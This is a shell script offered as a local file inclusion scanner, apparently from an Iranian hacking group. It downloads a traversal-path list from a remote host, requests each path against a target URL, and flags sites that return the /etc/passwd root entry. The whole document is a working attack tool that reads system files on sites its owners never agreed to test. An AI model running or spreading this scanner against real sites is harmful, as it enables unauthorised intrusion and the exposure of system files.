#!/bin/sh
# "*****************************************************************"
# "* In The Name Of ALLAH *"
# "* IrIsT LFI Scanner *"
# "* www.IrIsT.Ir *"
# "* Coded By : Beni_Vanda *"
# "* Gr33tz : Am!r ,C0dex ,B3HZ4D ,TaK.FaNaR ,0x0ptim0us *"
# "* m3hdi ,F@rid ,Dr.Tofan ,Dj.TiniVini ,Noter ,Spy Developer *"
# "* Net.W0lf ,M4F1 ,joker_s ,Godfather ,Mr.CrazyWeb ,esikley *"
# "* one hacker alone ,IR Anonymous ,Sukhoi SU-71 ,Mr.N!m@ *"
# "* && All Turkish/Iranian/Kurdish Hackerz *"
# "* Beni_Vanda@yahoo.com *"
# "*****************************************************************"
First_Arg=$1
function Usage()
{
echo ""
echo "# ***************************************************************************#"
echo "# Usage : lfi-scanner.sh [URL] *#"
echo "# Help : --help : Show This Menu *#"
echo "# RunScript : chmod 0755 perm to script and run it ./lfi-scanner.sh <url> *#"
echo "# ***************************************************************************#"
echo ""
}
function CheckArguments()
{
if [[ $First_Arg == "--help" ]]; then
Usage;
fi
if [[ $First_Arg == "" ]]; then
echo "[*] Wrong parameter! [URL] should be given!"
echo ""
exit 1;
fi
}
function CheckIsInjectable()
{
echo "Vulnerability URL's will be Store at Vulnerability_list.txt ..."
echo "starting ..."
for url in `cat lfi-path.txt`
do
wget -o download_url.log -O lfi.html $First_Arg$url
str=`grep "root:x:0:0:root:/root:/bin/bash" lfi.html`
if [[ $str = "" ]]
then
echo "[*] Trying ... >> Not Found "
rm lfi.html;
else
echo "[*] Trying ... >> Found "
echo $First_Arg$url >>Vulnerability_list.txt
fi
done
}
function main()
{
if [[ ! -d IrIsLFI ]]; then
mkdir IrIsTLFI;
fi
cd IrIsTLFI;
wget -o download_path.log http://benivanda.persiangig.com/tools/lfi-path.txt
CheckArguments;
CheckIsInjectable;
}
main;